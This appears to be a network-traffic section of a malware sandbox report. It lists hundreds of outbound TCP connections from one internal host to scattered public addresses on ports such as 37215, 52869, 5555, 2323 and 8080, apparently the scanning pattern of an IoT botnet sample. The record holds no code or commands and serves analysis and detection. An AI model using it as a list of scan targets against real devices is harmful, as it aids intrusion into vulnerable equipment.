                Source: global trafficTCP traffic: 192.168.2.20:47564 -> 82.37.108.31:8443
                Source: global trafficTCP traffic: 192.168.2.20:33110 -> 80.245.8.70:8443
                Source: global trafficTCP traffic: 192.168.2.20:43298 -> 103.36.247.14:37215
                Source: global trafficTCP traffic: 192.168.2.20:45520 -> 139.220.80.168:37215
                Source: global trafficTCP traffic: 192.168.2.20:53474 -> 1.30.247.172:37215
                Source: global trafficTCP traffic: 192.168.2.20:37520 -> 164.37.235.78:81
                Source: global trafficTCP traffic: 192.168.2.20:52784 -> 21.186.78.77:7574
                Source: global trafficTCP traffic: 192.168.2.20:60302 -> 120.211.21.195:8080
                Source: global trafficTCP traffic: 192.168.2.20:58960 -> 59.213.176.162:8080
                Source: global trafficTCP traffic: 192.168.2.20:41990 -> 85.191.228.237:8080
                Source: global trafficTCP traffic: 192.168.2.20:56656 -> 24.178.198.80:7574
                Source: global trafficTCP traffic: 192.168.2.20:40148 -> 121.189.109.57:52869
                Source: global trafficTCP traffic: 192.168.2.20:59514 -> 130.214.58.192:5555
                Source: global trafficTCP traffic: 192.168.2.20:59886 -> 199.4.48.239:8080
                Source: global trafficTCP traffic: 192.168.2.20:37810 -> 214.108.114.69:52869
                Source: global trafficTCP traffic: 192.168.2.20:56312 -> 211.86.78.89:8443
                Source: global trafficTCP traffic: 192.168.2.20:53826 -> 168.246.111.26:37215
                Source: global trafficTCP traffic: 192.168.2.20:58696 -> 151.76.245.168:8080
                Source: global trafficTCP traffic: 192.168.2.20:34400 -> 183.132.135.144:49152
                Source: global trafficTCP traffic: 192.168.2.20:34810 -> 39.174.77.150:49152
                Source: global trafficTCP traffic: 192.168.2.20:33672 -> 110.112.123.163:81
                Source: global trafficTCP traffic: 192.168.2.20:44618 -> 126.158.169.237:8080
                Source: global trafficTCP traffic: 192.168.2.20:52548 -> 43.143.2.136:49152
                Source: global trafficTCP traffic: 192.168.2.20:60356 -> 108.73.168.86:37215
                Source: global trafficTCP traffic: 192.168.2.20:58720 -> 20.153.133.142:8080
                Source: global trafficTCP traffic: 192.168.2.20:43074 -> 108.86.208.185:52869
                Source: global trafficTCP traffic: 192.168.2.20:49612 -> 201.141.203.203:5555
                Source: global trafficTCP traffic: 192.168.2.20:40250 -> 37.83.141.67:8443
                Source: global trafficTCP traffic: 192.168.2.20:36410 -> 93.254.188.46:8080
                Source: global trafficTCP traffic: 192.168.2.20:38756 -> 182.107.20.15:5555
                Source: global trafficTCP traffic: 192.168.2.20:33700 -> 36.78.245.121:8443
                Source: global trafficTCP traffic: 192.168.2.20:47664 -> 143.210.194.129:5555
                Source: global trafficTCP traffic: 192.168.2.20:38780 -> 146.149.143.40:37215
                Source: global trafficTCP traffic: 192.168.2.20:42408 -> 88.225.182.172:37215
                Source: global trafficTCP traffic: 192.168.2.20:58168 -> 165.149.217.240:8080
                Source: global trafficTCP traffic: 192.168.2.20:57044 -> 122.246.229.135:52869
                Source: global trafficTCP traffic: 192.168.2.20:38482 -> 40.151.66.173:8080
                Source: global trafficTCP traffic: 192.168.2.20:38784 -> 109.196.110.179:49152
                Source: global trafficTCP traffic: 192.168.2.20:40494 -> 25.220.37.35:8080
                Source: global trafficTCP traffic: 192.168.2.20:46290 -> 11.229.75.234:49152
                Source: global trafficTCP traffic: 192.168.2.20:60136 -> 47.231.230.232:8443
                Source: global trafficTCP traffic: 192.168.2.20:38042 -> 36.77.151.76:49152
                Source: global trafficTCP traffic: 192.168.2.20:51616 -> 49.1.7.205:52869
                Source: global trafficTCP traffic: 192.168.2.20:57454 -> 34.238.197.36:8080
                Source: global trafficTCP traffic: 192.168.2.20:53350 -> 203.176.16.105:8080
                Source: global trafficTCP traffic: 192.168.2.20:39722 -> 14.73.117.144:52869
                Source: global trafficTCP traffic: 192.168.2.20:40782 -> 170.151.103.184:7574
                Source: global trafficTCP traffic: 192.168.2.20:48258 -> 76.34.194.91:8080
                Source: global trafficTCP traffic: 192.168.2.20:59688 -> 16.65.75.160:52869
                Source: global trafficTCP traffic: 192.168.2.20:49042 -> 195.28.214.1:5555
                Source: global trafficTCP traffic: 192.168.2.20:47200 -> 81.85.194.30:8080
                Source: global trafficTCP traffic: 192.168.2.20:56756 -> 86.150.240.234:37215
                Source: global trafficTCP traffic: 192.168.2.20:35898 -> 95.101.120.128:8080
                Source: global trafficTCP traffic: 192.168.2.20:48694 -> 83.81.254.230:7574
                Source: global trafficTCP traffic: 192.168.2.20:45612 -> 60.86.119.144:81
                Source: global trafficTCP traffic: 192.168.2.20:35764 -> 186.119.243.90:49152
                Source: global trafficTCP traffic: 192.168.2.20:32940 -> 27.33.40.40:8443
                Source: global trafficTCP traffic: 192.168.2.20:35544 -> 126.61.58.229:37215
                Source: global trafficTCP traffic: 192.168.2.20:33802 -> 200.240.85.208:52869
                Source: global trafficTCP traffic: 192.168.2.20:57480 -> 175.192.25.171:8080
                Source: global trafficTCP traffic: 192.168.2.20:42410 -> 197.44.113.237:8443
                Source: global trafficTCP traffic: 192.168.2.20:43818 -> 191.184.16.254:8080
                Source: global trafficTCP traffic: 192.168.2.20:60776 -> 68.82.30.86:8443
                Source: global trafficTCP traffic: 192.168.2.20:41850 -> 17.74.78.16:8080
                Source: global trafficTCP traffic: 192.168.2.20:57370 -> 19.227.52.166:8443
                Source: global trafficTCP traffic: 192.168.2.20:52122 -> 202.34.135.27:7574
                Source: global trafficTCP traffic: 192.168.2.20:43226 -> 198.50.156.201:8080
                Source: global trafficTCP traffic: 192.168.2.20:53640 -> 123.237.248.195:52869
                Source: global trafficTCP traffic: 192.168.2.20:45910 -> 95.98.64.180:8080
                Source: global trafficTCP traffic: 192.168.2.20:58966 -> 49.245.175.4:8080
                Source: global trafficTCP traffic: 192.168.2.20:51354 -> 29.202.233.5:37215
                Source: global trafficTCP traffic: 192.168.2.20:60896 -> 92.186.8.163:8080
                Source: global trafficTCP traffic: 192.168.2.20:41414 -> 135.228.46.217:8080
                Source: global trafficTCP traffic: 192.168.2.20:40950 -> 174.252.187.249:37215
                Source: global trafficTCP traffic: 192.168.2.20:41290 -> 89.4.36.102:37215
                Source: global trafficTCP traffic: 192.168.2.20:43478 -> 149.42.172.25:7574
                Source: global trafficTCP traffic: 192.168.2.20:35888 -> 137.197.44.71:8443
                Source: global trafficTCP traffic: 192.168.2.20:56664 -> 197.181.82.192:52869
                Source: global trafficTCP traffic: 192.168.2.20:57416 -> 174.135.4.19:8080
                Source: global trafficTCP traffic: 192.168.2.20:51356 -> 199.164.2.226:5555
                Source: global trafficTCP traffic: 192.168.2.20:58378 -> 39.8.92.226:8080
                Source: global trafficTCP traffic: 192.168.2.20:35422 -> 222.8.146.13:8443
                Source: global trafficTCP traffic: 192.168.2.20:36822 -> 141.145.10.198:49152
                Source: global trafficTCP traffic: 192.168.2.20:33320 -> 108.77.7.163:49152
                Source: global trafficTCP traffic: 192.168.2.20:33196 -> 16.146.174.98:5555
                Source: global trafficTCP traffic: 192.168.2.20:43882 -> 38.150.249.112:8443
                Source: global trafficTCP traffic: 192.168.2.20:42304 -> 93.175.160.79:52869
                Source: global trafficTCP traffic: 192.168.2.20:42934 -> 179.196.98.226:7574
                Source: global trafficTCP traffic: 192.168.2.20:48398 -> 105.158.147.174:81
                Source: global trafficTCP traffic: 192.168.2.20:39078 -> 149.189.159.233:37215
                Source: global trafficTCP traffic: 192.168.2.20:51686 -> 62.107.94.94:8080
                Source: global trafficTCP traffic: 192.168.2.20:57748 -> 74.208.118.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:56716 -> 182.104.216.147:52869
                Source: global trafficTCP traffic: 192.168.2.20:34106 -> 187.16.231.32:37215
                Source: global trafficTCP traffic: 192.168.2.20:34826 -> 182.157.115.73:49152
                Source: global trafficTCP traffic: 192.168.2.20:50148 -> 186.67.89.101:8080
                Source: global trafficTCP traffic: 192.168.2.20:53370 -> 129.126.74.71:81
                Source: global trafficTCP traffic: 192.168.2.20:46502 -> 36.138.107.187:49152
                Source: global trafficTCP traffic: 192.168.2.20:38782 -> 159.223.77.33:7574
                Source: global trafficTCP traffic: 192.168.2.20:59708 -> 96.210.216.56:8443
                Source: global trafficTCP traffic: 192.168.2.20:54996 -> 101.164.76.184:52869
                Source: global trafficTCP traffic: 192.168.2.20:48852 -> 80.245.214.44:5555
                Source: global trafficTCP traffic: 192.168.2.20:47984 -> 184.106.84.55:8080
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 111.94.109.213:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 27.245.148.122:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 216.168.246.82:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 4.29.56.116:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 38.107.4.6:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 216.104.95.57:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 47.225.32.191:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 115.172.34.22:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 165.24.244.15:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 110.54.63.53:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 91.89.192.214:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 123.150.242.243:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 156.56.38.42:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 174.28.155.92:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 188.214.50.61:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 122.55.125.10:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 198.150.168.4:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 14.109.51.21:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 100.177.221.80:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 139.152.15.126:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 47.161.81.172:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 13.63.61.154:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 206.220.228.131:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 93.29.142.216:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 176.45.32.163:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 124.37.144.160:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 63.138.123.177:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 154.144.107.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 85.93.120.215:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 83.206.191.47:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 59.141.175.49:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 170.104.98.24:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 61.90.94.67:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 194.225.68.79:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 24.105.116.75:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 89.162.4.190:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 71.116.155.86:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 174.213.151.13:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 121.175.138.7:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 195.28.143.84:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 217.111.127.234:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 32.237.238.150:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 54.121.138.212:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 186.206.2.61:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 125.45.118.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 147.237.210.54:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 217.98.141.9:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 2.69.114.203:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 8.78.234.102:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 76.102.146.7:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 31.225.215.251:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 46.166.183.35:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 71.226.140.212:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 179.1.27.195:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 178.103.96.49:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 209.50.36.159:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 70.77.125.153:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 203.140.50.39:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 36.107.62.85:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 167.143.118.183:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 81.90.71.55:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 114.149.31.119:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 45.18.116.249:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 40.170.168.4:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 70.44.30.7:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 73.168.135.102:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 62.29.193.16:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 105.88.240.95:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 63.188.38.111:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 219.92.27.198:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 120.99.119.111:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 40.201.181.241:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 31.196.60.220:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 220.1.153.205:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 133.67.141.167:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 110.164.249.236:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 135.132.147.203:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 39.82.50.240:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 113.104.218.82:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 171.160.36.48:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 19.191.96.74:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 206.237.149.185:2323
                Source: global trafficTCP traffic: 192.168.2.20:51666 -> 48.38.228.119:37215
                Source: global trafficTCP traffic: 192.168.2.20:55084 -> 171.80.64.115:7574
                Source: global trafficTCP traffic: 192.168.2.20:37922 -> 47.112.175.159:8443
                Source: global trafficTCP traffic: 192.168.2.20:39908 -> 44.103.97.78:8080
                Source: global trafficTCP traffic: 192.168.2.20:55610 -> 180.157.38.69:7574
                Source: global trafficTCP traffic: 192.168.2.20:50832 -> 67.224.83.245:8080
                Source: global trafficTCP traffic: 192.168.2.20:56492 -> 23.11.95.110:37215
                Source: global trafficTCP traffic: 192.168.2.20:50150 -> 42.186.87.158:52869
                Source: global trafficTCP traffic: 192.168.2.20:53732 -> 123.41.22.146:5555
                Source: global trafficTCP traffic: 192.168.2.20:43170 -> 206.113.172.55:5555
                Source: global trafficTCP traffic: 192.168.2.20:56982 -> 11.161.130.93:7574
                Source: global trafficTCP traffic: 192.168.2.20:55592 -> 197.241.111.186:7574
                Source: global trafficTCP traffic: 192.168.2.20:43670 -> 17.171.21.221:81
                Source: global trafficTCP traffic: 192.168.2.20:56286 -> 49.162.158.92:7574
                Source: global trafficTCP traffic: 192.168.2.20:44560 -> 58.83.78.135:7574
                Source: global trafficTCP traffic: 192.168.2.20:56802 -> 211.10.41.156:37215
                Source: global trafficTCP traffic: 192.168.2.20:60784 -> 163.5.97.251:81
                Source: global trafficTCP traffic: 192.168.2.20:56348 -> 202.51.68.65:52869
                Source: global trafficTCP traffic: 192.168.2.20:43936 -> 132.125.134.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:33974 -> 125.233.81.181:5555
                Source: global trafficTCP traffic: 192.168.2.20:49644 -> 219.72.130.131:52869
                Source: global trafficTCP traffic: 192.168.2.20:45920 -> 72.48.87.170:81
                Source: global trafficTCP traffic: 192.168.2.20:54482 -> 156.203.51.71:52869
                Source: global trafficTCP traffic: 192.168.2.20:38870 -> 222.89.163.71:52869
                Source: global trafficTCP traffic: 192.168.2.20:54236 -> 67.154.29.99:8080
                Source: global trafficTCP traffic: 192.168.2.20:45226 -> 28.24.68.105:5555
                Source: global trafficTCP traffic: 192.168.2.20:54834 -> 146.106.79.93:49152
                Source: global trafficTCP traffic: 192.168.2.20:34598 -> 129.65.108.24:5555
                Source: global trafficTCP traffic: 192.168.2.20:34120 -> 49.183.251.35:8443
                Source: global trafficTCP traffic: 192.168.2.20:56828 -> 14.131.47.227:52869
                Source: global trafficTCP traffic: 192.168.2.20:56514 -> 154.247.85.42:8080
                Source: global trafficTCP traffic: 192.168.2.20:33082 -> 190.231.42.136:37215
                Source: global trafficTCP traffic: 192.168.2.20:47700 -> 115.18.168.79:8080
                Source: global trafficTCP traffic: 192.168.2.20:38916 -> 71.251.113.238:5555
                Source: global trafficTCP traffic: 192.168.2.20:58026 -> 193.226.141.130:81
                Source: global trafficTCP traffic: 192.168.2.20:50436 -> 152.26.85.31:8443
                Source: global trafficTCP traffic: 192.168.2.20:57174 -> 159.193.139.173:81
                Source: global trafficTCP traffic: 192.168.2.20:57306 -> 40.43.172.11:37215
                Source: global trafficTCP traffic: 192.168.2.20:40524 -> 203.155.149.72:81
                Source: global trafficTCP traffic: 192.168.2.20:40494 -> 5.147.60.12:37215
                Source: global trafficTCP traffic: 192.168.2.20:55674 -> 140.23.32.247:8443
                Source: global trafficTCP traffic: 192.168.2.20:38606 -> 117.167.92.191:52869
                Source: global trafficTCP traffic: 192.168.2.20:35006 -> 124.55.234.220:81
                Source: global trafficTCP traffic: 192.168.2.20:59668 -> 74.232.137.164:5555
                Source: global trafficTCP traffic: 192.168.2.20:50708 -> 207.102.60.4:8080
                Source: global trafficTCP traffic: 192.168.2.20:51106 -> 46.222.134.3:8080
                Source: global trafficTCP traffic: 192.168.2.20:43478 -> 51.123.219.80:8443
                Source: global trafficTCP traffic: 192.168.2.20:35768 -> 1.210.9.44:5555
                Source: global trafficTCP traffic: 192.168.2.20:52016 -> 154.57.218.161:49152
                Source: global trafficTCP traffic: 192.168.2.20:42950 -> 37.111.156.94:8080
                Source: global trafficTCP traffic: 192.168.2.20:45136 -> 122.228.67.222:49152
                Source: global trafficTCP traffic: 192.168.2.20:60528 -> 122.243.131.89:7574
                Source: global trafficTCP traffic: 192.168.2.20:48566 -> 210.116.241.219:5555
                Source: global trafficTCP traffic: 192.168.2.20:43386 -> 11.226.128.181:8080
                Source: global trafficTCP traffic: 192.168.2.20:60056 -> 217.125.147.200:5555
                Source: global trafficTCP traffic: 192.168.2.20:40164 -> 220.131.225.243:8080
                Source: global trafficTCP traffic: 192.168.2.20:46268 -> 55.187.88.64:8080
                Source: global trafficTCP traffic: 192.168.2.20:40716 -> 163.36.51.21:5555
                Source: global trafficTCP traffic: 192.168.2.20:54422 -> 64.42.1.11:81
                Source: global trafficTCP traffic: 192.168.2.20:54210 -> 206.117.114.232:8443
                Source: global trafficTCP traffic: 192.168.2.20:44944 -> 222.133.41.233:5555
                Source: global trafficTCP traffic: 192.168.2.20:34578 -> 99.155.210.76:8443
                Source: global trafficTCP traffic: 192.168.2.20:45528 -> 84.78.78.130:8080
                Source: global trafficTCP traffic: 192.168.2.20:57140 -> 114.194.154.112:8443
                Source: global trafficTCP traffic: 192.168.2.20:59960 -> 118.126.149.210:81
                Source: global trafficTCP traffic: 192.168.2.20:37068 -> 102.245.187.124:8080
                Source: global trafficTCP traffic: 192.168.2.20:48564 -> 178.227.209.201:8080
                Source: global trafficTCP traffic: 192.168.2.20:35660 -> 89.89.254.121:7574
                Source: global trafficTCP traffic: 192.168.2.20:40876 -> 161.117.155.134:49152
                Source: global trafficTCP traffic: 192.168.2.20:35122 -> 47.125.48.176:5555
                Source: global trafficTCP traffic: 192.168.2.20:43976 -> 215.181.140.3:81
                Source: global trafficTCP traffic: 192.168.2.20:53318 -> 166.221.246.62:7574
                Source: global trafficTCP traffic: 192.168.2.20:56982 -> 1.21.220.147:8443
                Source: global trafficTCP traffic: 192.168.2.20:44516 -> 215.199.64.119:8080
                Source: global trafficTCP traffic: 192.168.2.20:34308 -> 213.35.187.150:7574
                Source: global trafficTCP traffic: 192.168.2.20:45786 -> 205.13.133.200:81
                Source: global trafficTCP traffic: 192.168.2.20:51100 -> 191.252.54.212:52869
                Source: global trafficTCP traffic: 192.168.2.20:47264 -> 174.166.72.112:8080
                Source: global trafficTCP traffic: 192.168.2.20:55356 -> 89.18.94.49:52869
                Source: global trafficTCP traffic: 192.168.2.20:41066 -> 66.220.233.134:8443
                Source: global trafficTCP traffic: 192.168.2.20:50846 -> 208.243.26.125:5555
                Source: global trafficTCP traffic: 192.168.2.20:33342 -> 95.80.182.34:8443
                Source: global trafficTCP traffic: 192.168.2.20:48468 -> 129.9.82.238:52869
                Source: global trafficTCP traffic: 192.168.2.20:34874 -> 126.12.240.246:81
                Source: global trafficTCP traffic: 192.168.2.20:49698 -> 41.9.236.30:37215
                Source: global trafficTCP traffic: 192.168.2.20:44546 -> 115.114.122.15:52869
                Source: global trafficTCP traffic: 192.168.2.20:52378 -> 55.59.39.140:8443
                Source: global trafficTCP traffic: 192.168.2.20:41488 -> 216.211.142.82:37215
                Source: global trafficTCP traffic: 192.168.2.20:58570 -> 64.104.185.88:5555
                Source: global trafficTCP traffic: 192.168.2.20:49562 -> 65.99.212.62:5555
                Source: global trafficTCP traffic: 192.168.2.20:32920 -> 209.34.156.41:8080
                Source: global trafficTCP traffic: 192.168.2.20:38992 -> 190.21.153.214:7574
                Source: global trafficTCP traffic: 192.168.2.20:39230 -> 58.205.220.62:5555
                Source: global trafficTCP traffic: 192.168.2.20:51852 -> 125.120.31.95:7574
                Source: global trafficTCP traffic: 192.168.2.20:56814 -> 41.244.197.101:8443
                Source: global trafficTCP traffic: 192.168.2.20:43750 -> 138.208.123.55:8080
                Source: global trafficTCP traffic: 192.168.2.20:51466 -> 183.51.240.43:8080
                Source: global trafficTCP traffic: 192.168.2.20:42914 -> 35.244.23.134:49152
                Source: global trafficTCP traffic: 192.168.2.20:54738 -> 130.52.53.47:81
                Source: global trafficTCP traffic: 192.168.2.20:56558 -> 220.221.221.108:8080
                Source: global trafficTCP traffic: 192.168.2.20:54948 -> 152.90.233.152:5555
                Source: global trafficTCP traffic: 192.168.2.20:55164 -> 27.169.136.209:49152
                Source: global trafficTCP traffic: 192.168.2.20:38372 -> 40.99.150.234:8443
                Source: global trafficTCP traffic: 192.168.2.20:49502 -> 74.96.156.31:81
                Source: global trafficTCP traffic: 192.168.2.20:47774 -> 193.51.46.187:81
                Source: global trafficTCP traffic: 192.168.2.20:44296 -> 216.109.183.183:49152
                Source: global trafficTCP traffic: 192.168.2.20:47590 -> 126.191.100.107:49152
                Source: global trafficTCP traffic: 192.168.2.20:47550 -> 125.153.37.11:5555
                Source: global trafficTCP traffic: 192.168.2.20:39112 -> 114.132.33.150:49152
                Source: global trafficTCP traffic: 192.168.2.20:60534 -> 155.0.76.184:8080
                Source: global trafficTCP traffic: 192.168.2.20:46608 -> 188.115.113.70:5555
                Source: global trafficTCP traffic: 192.168.2.20:43454 -> 79.231.62.91:49152
                Source: global trafficTCP traffic: 192.168.2.20:44782 -> 136.133.36.86:5555
                Source: global trafficTCP traffic: 192.168.2.20:59126 -> 51.188.61.166:8080
                Source: global trafficTCP traffic: 192.168.2.20:35234 -> 12.4.137.28:8443
                Source: global trafficTCP traffic: 192.168.2.20:35780 -> 208.226.139.99:8080
                Source: global trafficTCP traffic: 192.168.2.20:60242 -> 71.129.56.39:52869
                Source: global trafficTCP traffic: 192.168.2.20:49370 -> 82.33.25.142:8443
                Source: global trafficTCP traffic: 192.168.2.20:40060 -> 99.7.230.121:81
                Source: global trafficTCP traffic: 192.168.2.20:53220 -> 87.236.72.115:8080
                Source: global trafficTCP traffic: 192.168.2.20:55288 -> 106.165.30.99:5555
                Source: global trafficTCP traffic: 192.168.2.20:60864 -> 164.83.153.43:52869
                Source: global trafficTCP traffic: 192.168.2.20:45296 -> 89.28.59.57:49152
                Source: global trafficTCP traffic: 192.168.2.20:51774 -> 133.89.144.60:7574
                Source: global trafficTCP traffic: 192.168.2.20:40538 -> 136.86.4.57:8080
                Source: global trafficTCP traffic: 192.168.2.20:46918 -> 148.33.215.101:52869
                Source: global trafficTCP traffic: 192.168.2.20:55352 -> 187.248.127.144:8080
                Source: global trafficTCP traffic: 192.168.2.20:56308 -> 60.81.104.12:49152
                Source: global trafficTCP traffic: 192.168.2.20:34138 -> 36.120.123.216:52869
                Source: global trafficTCP traffic: 192.168.2.20:52034 -> 216.189.38.126:5555
                Source: global trafficTCP traffic: 192.168.2.20:60450 -> 122.16.34.10:81
                Source: global trafficTCP traffic: 192.168.2.20:34828 -> 69.108.163.108:49152
                Source: global trafficTCP traffic: 192.168.2.20:56598 -> 147.121.39.228:7574
                Source: global trafficTCP traffic: 192.168.2.20:35588 -> 219.217.46.6:81
                Source: global trafficTCP traffic: 192.168.2.20:60950 -> 121.89.157.177:52869
                Source: global trafficTCP traffic: 192.168.2.20:60216 -> 200.177.82.26:52869
                Source: global trafficTCP traffic: 192.168.2.20:54950 -> 95.145.77.101:5555
                Source: global trafficTCP traffic: 192.168.2.20:40288 -> 47.59.64.91:81
                Source: global trafficTCP traffic: 192.168.2.20:32940 -> 75.154.37.154:8080
                Source: global trafficTCP traffic: 192.168.2.20:44980 -> 119.192.203.59:5555
                Source: global trafficTCP traffic: 192.168.2.20:47606 -> 146.33.219.4:7574
                Source: global trafficTCP traffic: 192.168.2.20:54352 -> 75.178.23.163:52869
                Source: global trafficTCP traffic: 192.168.2.20:47506 -> 45.1.148.196:5555
                Source: global trafficTCP traffic: 192.168.2.20:60564 -> 157.48.19.236:8443
                Source: global trafficTCP traffic: 192.168.2.20:35052 -> 68.116.62.82:37215
                Source: global trafficTCP traffic: 192.168.2.20:32946 -> 33.11.4.154:8443
                Source: global trafficTCP traffic: 192.168.2.20:49746 -> 194.176.233.134:8080
                Source: global trafficTCP traffic: 192.168.2.20:46522 -> 178.221.126.119:7574
                Source: global trafficTCP traffic: 192.168.2.20:55064 -> 38.116.11.222:37215
                Source: global trafficTCP traffic: 192.168.2.20:39102 -> 179.128.137.93:5555
                Source: global trafficTCP traffic: 192.168.2.20:52894 -> 6.36.182.64:81
                Source: global trafficTCP traffic: 192.168.2.20:46148 -> 151.29.44.170:8443
                Source: global trafficTCP traffic: 192.168.2.20:42380 -> 162.53.49.185:52869
                Source: global trafficTCP traffic: 192.168.2.20:45344 -> 168.119.247.129:7574
                Source: global trafficTCP traffic: 192.168.2.20:43220 -> 136.79.119.26:52869
                Source: global trafficTCP traffic: 192.168.2.20:39634 -> 60.229.225.32:8080
                Source: global trafficTCP traffic: 192.168.2.20:45634 -> 58.167.45.11:52869
                Source: global trafficTCP traffic: 192.168.2.20:38652 -> 61.40.32.6:7574
                Source: global trafficTCP traffic: 192.168.2.20:43210 -> 6.51.176.149:8443
                Source: global trafficTCP traffic: 192.168.2.20:44510 -> 178.99.201.110:7574
                Source: global trafficTCP traffic: 192.168.2.20:34826 -> 129.212.171.46:5555
                Source: global trafficTCP traffic: 192.168.2.20:40684 -> 111.14.162.42:37215
                Source: global trafficTCP traffic: 192.168.2.20:41314 -> 138.193.244.97:52869
                Source: global trafficTCP traffic: 192.168.2.20:35440 -> 106.231.94.244:37215
                Source: global trafficTCP traffic: 192.168.2.20:57628 -> 94.140.74.218:49152
                Source: global trafficTCP traffic: 192.168.2.20:49032 -> 24.202.186.134:8080
                Source: global trafficTCP traffic: 192.168.2.20:39754 -> 77.85.128.99:8443
                Source: global trafficTCP traffic: 192.168.2.20:57408 -> 209.109.213.167:8080
                Source: global trafficTCP traffic: 192.168.2.20:58972 -> 68.85.90.202:8080
                Source: global trafficTCP traffic: 192.168.2.20:41654 -> 116.181.231.91:52869
                Source: global trafficTCP traffic: 192.168.2.20:38768 -> 59.111.64.242:8080
                Source: global trafficTCP traffic: 192.168.2.20:57134 -> 189.183.63.36:8443
                Source: global trafficTCP traffic: 192.168.2.20:48826 -> 222.140.49.50:8443
                Source: global trafficTCP traffic: 192.168.2.20:52674 -> 209.218.138.94:52869
                Source: global trafficTCP traffic: 192.168.2.20:54540 -> 112.83.20.39:8443
                Source: global trafficTCP traffic: 192.168.2.20:50002 -> 56.168.205.50:7574
                Source: global trafficTCP traffic: 192.168.2.20:57036 -> 190.88.215.104:7574
                Source: global trafficTCP traffic: 192.168.2.20:44032 -> 58.245.130.186:37215
                Source: global trafficTCP traffic: 192.168.2.20:36818 -> 39.188.36.44:8443
                Source: global trafficTCP traffic: 192.168.2.20:58104 -> 27.217.196.243:8080
                Source: global trafficTCP traffic: 192.168.2.20:45748 -> 66.186.206.134:8080
